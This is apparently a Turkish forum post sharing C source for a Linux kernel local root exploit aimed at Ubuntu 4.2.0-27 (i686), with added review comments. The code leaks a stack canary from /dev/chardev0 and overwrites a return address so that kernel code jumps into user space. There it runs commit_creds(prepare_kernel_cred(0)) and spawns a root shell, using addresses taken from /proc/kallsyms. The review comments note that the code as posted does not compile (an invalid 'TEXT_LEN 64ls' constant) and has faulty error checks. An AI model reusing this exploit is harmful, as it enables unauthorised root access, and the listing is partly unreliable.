
Linux Ubuntu 4.2.0-27-generic Local root exploit

Tr0n

Eğer istek olursa Linux kernel'ine exploit yazma konusunu da paylaşırım.
Exploiti yazdığım kernel no :
Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP 2016 i686 i686 i686 GNU/Linux
Exploit:
C:
//gcc -static -o exploit exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdint.h>
 
/* Number of bytes main() asks read() to return from the device.
 * NOTE(review): `64ls` is not a valid C integer constant, so the listing
 * does not build exactly as posted; it looks like a paste artifact. */
#define TEXT_LEN 64ls
 
/* Five-word frame in the order eip, cs, eflags, esp, ss. payload() points
 * %esp at the single global instance `tf` and executes `iret`, so this is
 * the frame that instruction consumes. `packed` keeps the fields at the
 * byte offsets 0/4/8/12/16 that prepare_tf() hard-codes in its inline asm
 * (this assumes 4-byte pointers; the post targets an i686 kernel). */
struct trap_frame {
    void * eip ;        
    uint32_t cs ;      
    uint32_t eflags ;       
    void * esp ;       
    uint32_t ss ;       
} __attribute__((packed));
/* Global instance referenced by symbol name from the inline asm below. */
struct trap_frame tf;
 
/* Replaces the current process image with /bin/sh. prepare_tf() stores this
 * function's address in tf.eip, so it is where execution resumes after the
 * iret in payload(). The execl() result is not checked; a failed exec is
 * not reported. */
void getShell(void) {
    execl("/bin/sh", "sh", NULL);
}
 
/* Fills the global frame `tf` from the calling process's current user-mode
 * context so that a later iret can return to it. Must run before the frame
 * is consumed by payload(); main() calls it just before write(). */
void prepare_tf(void) {
    /* Each push/pop pair copies one value into tf by byte offset:
     * %cs -> tf+4, EFLAGS -> tf+8, %esp -> tf+12, %ss -> tf+16. */
    asm("pushl %cs; popl tf+4;"
        "pushfl; popl tf+8;"
        "pushl %esp; popl tf+12;"
        "pushl %ss; popl tf+16;");
    /* Resume address for the frame. */
    tf.eip = &getShell ;
    /* Moves the saved stack pointer 1024 bytes lower; presumably to keep the
     * resumed code clear of the live frames here -- TODO confirm intent.
     * Arithmetic on void * is a GNU C extension. */
    tf.esp -= 1024;         
}
 
/* Function pointers that main() fills with the addresses kallsym_getaddr()
 * parses out of /proc/kallsyms. Arguments and results are declared as
 * unsigned long rather than as struct cred pointers. regparm(3) is the GCC
 * x86-32 attribute for passing up to three integer arguments in registers;
 * presumably chosen to match how the 32-bit kernel was built -- confirm. */
unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
 
/* Calls commit_creds(prepare_kernel_cred(0)) through the two resolved
 * pointers, then loads %esp with the address of `tf` and executes iret,
 * which resumes at the frame prepare_tf() built (eip = getShell).
 *
 * main() stores this function's address at offset 84 of the buffer it
 * writes to the device, so this is user-space code that is presumably meant
 * to be entered from kernel context.
 *
 * Defensive note: that only works when the kernel can execute user pages
 * and when the two symbol addresses are readable by the caller. SMEP on
 * supporting CPUs blocks the former; restricting /proc/kallsyms (see
 * kallsym_getaddr) removes the latter. */
void payload(void)
{
    commit_creds(prepare_kernel_cred(0));
    asm("mov $tf, %esp;"
        "iret ;");
}
 
/* Looks up a kernel symbol in /proc/kallsyms.
 *
 * str: exact symbol name to match.
 * Returns the address parsed as hexadecimal from the matching line, or 0
 * when no line matches.
 *
 * Each line is treated as "<hex address> <type char> <name>": the text up to
 * the first space is the address, the next three characters are skipped,
 * and the remainder is compared with str.
 *
 * Defensive note: the lookup depends on unprivileged readers seeing real
 * addresses. With kernel.kptr_restrict enabled the addresses are shown as
 * zeros to such readers, so this returns 0 and main() stops.
 *
 * NOTE(review): fopen() reports failure with NULL, so the `stream < 0` test
 * below does not detect it; the stream is never closed; and the copy into
 * addr[32] is bounded neither by the array size nor by the end of the line. */
unsigned long kallsym_getaddr(const char* str)
{
    FILE *stream;
    char fbuf[256];
    char addr[32];
 
    stream = fopen("/proc/kallsyms","r");
    if(stream < 0)
    {
        printf("failed to open /proc/kallsyms\n");
        return 0;
    }
 
    memset(fbuf,0x00,sizeof(fbuf));
 
    while(fgets(fbuf,256,stream) != NULL)
    {
        char *p = fbuf;
        char *a = addr;
 
        if(strlen(fbuf) == 0)
            continue;
 
        /* Clear the address buffer and drop the last character of the line
         * (the newline fgets keeps, when the line fit in fbuf). */
        memset(addr,0x00,sizeof(addr));
        fbuf[strlen(fbuf)-1] = '\0';
 
        /* Copy the leading hex field up to the first space. */
        while(*p != ' ')
            *a++ = *p++;
 
        /* Skip " <type> " so p points at the symbol name. */
        p+=3;
    if(!strcmp(p,str))
            return strtoul(addr, NULL, 16);
    }
    return 0;
}
 
/* Entry point. In order: resolves two kernel symbol addresses, opens
 * /dev/chardev0, reads TEXT_LEN bytes from it after seeking forward 32,
 * hex-dumps 64 bytes of the result, takes four of those bytes as a "canary",
 * builds an 88-byte buffer around them and writes it back to the device.
 * Always returns 0.
 *
 * NOTE(review): the driver behind /dev/chardev0 is not shown on the page and
 * the name does not look like a stock kernel device; the post title names a
 * kernel release, but the exposure appears to be specific to whichever
 * module provides this node -- confirm before scoping affected systems.
 * Presumably that driver's read path returns more than it should and its
 * write path copies more than its buffer holds; bounding both copies to the
 * buffer size in the driver is the root fix.
 *
 * NOTE(review): the results of lseek(), read() and write() are ignored, and
 * a failed open() is only reported; execution continues with fd < 0. */
int main()
{
    static char buf[128],rop[128];
    char canary[4];
    int fd,i,j;
 
    
    /* Symbol addresses come from /proc/kallsyms; 0 means "not found" (or
     * hidden from this user) and ends the run. The unsigned long result is
     * assigned to a function pointer without a cast. */
    commit_creds = kallsym_getaddr("commit_creds");
    if(commit_creds == 0)
    {
        printf("failed to get commit_creds address\n");
        return 0;
    }
    printf("commit_creds address is :%p\n",commit_creds);
 

    prepare_kernel_cred = kallsym_getaddr("prepare_kernel_cred");
    if(prepare_kernel_cred == 0)
    {
        printf("failed to get prepare_kernel_cred address\n");
        return 0;
    }
    printf("prepare_kernel_cred address is :%p\n",prepare_kernel_cred);
 

    if ((fd = open("/dev/chardev0", O_RDWR)) < 0){
        printf("Cannot open /dev/chardev0. Try again later.\n");
    }
 
    /* Advance the file position by 32, then read TEXT_LEN bytes into buf. */
    lseek(fd, 32, SEEK_CUR);
    read(fd, buf, TEXT_LEN);
 
    /* Hex + character dump of the first 64 bytes of buf, 16 per row. */
    for (i = 0; i < 4; i++)
    {
        for (j = 0; j < 16; j++) printf("%02x ", buf[i*16+j] & 0xff);
        printf(" | ");
        for (j = 0; j < 16; j++) printf("%c", buf[i*16+j] & 0xff);
        printf("\n");
    }
 
    /* Bytes 32..35 of what was read are kept and printed as the canary. */
    memcpy(canary, buf+32,4);
    printf("canary is :");
    for(i = 0;i < 4;i++){
        printf("%02x ",canary[i] & 0xff);
    }
    printf("\n");
 

    /* 88-byte buffer layout: 64 x 'A', the 4 saved canary bytes, 16 x 'B',
     * then the address of payload() at offset 84. */
    memset(rop, 'A', 64);
    memcpy(rop+64, canary, 4);
    memset(rop+68, 'B', 16);
    *((void**)(rop+84)) = &payload;
 
    /* The frame in tf must be populated before the write below. */
    prepare_tf();
 
    
    write(fd, rop, 88);
    if (close(fd) != 0){
        printf("Cannot close.\n");
    }
    return 0;
}
 